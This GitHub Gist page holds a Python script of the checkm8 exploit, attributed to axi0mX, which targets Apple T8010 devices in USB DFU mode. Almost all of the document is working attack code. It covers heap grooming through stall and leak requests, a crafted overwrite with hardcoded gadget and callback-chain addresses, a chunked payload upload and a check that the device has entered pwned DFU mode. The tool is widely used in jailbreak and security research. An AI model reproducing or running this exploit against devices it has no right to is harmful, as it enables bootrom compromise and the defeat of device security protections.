Created
May 17, 2024 12:21
-
-
Save bbaranoff/0d9e905d430128076ca96fb7f303d05c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from checkm8 import * | |
def main(): | |
print '*** checkm8 exploit by axi0mX ***' | |
device = dfu.acquire_device(1800) | |
start = time.time() | |
print 'Found:', device.serial_number | |
if 'PWND:[' in device.serial_number: | |
print 'Device is already in pwned DFU Mode. Not executing exploit.' | |
return | |
payload, _ = exploit_config(device.serial_number) | |
t8010_nop_gadget = 0x10000CC6C | |
callback_chain = 0x1800B0800 | |
t8010_overwrite = '\0' * 0x5c0 | |
t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain) | |
# heap feng-shui | |
stall(device) | |
leak(device) | |
for i in range(6): | |
no_leak(device) | |
dfu.usb_reset(device) | |
dfu.release_device(device) | |
# set global state and restart usb | |
device = dfu.acquire_device() | |
device.serial_number | |
libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001) | |
libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) | |
dfu.release_device(device) | |
time.sleep(0.5) | |
# heap occupation | |
device = dfu.acquire_device() | |
device.serial_number | |
stall(device) | |
leak(device) | |
leak(device) | |
libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50) | |
for i in range(0, len(payload), 0x800): | |
libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, | |
payload[i:i+0x800], 50) | |
dfu.usb_reset(device) | |
dfu.release_device(device) | |
device = dfu.acquire_device() | |
if 'PWND:[checkm8]' not in device.serial_number: | |
print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.' | |
sys.exit(1) | |
print 'Device is now in pwned DFU Mode.' | |
print '(%0.2f seconds)' % (time.time() - start) | |
dfu.release_device(device) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment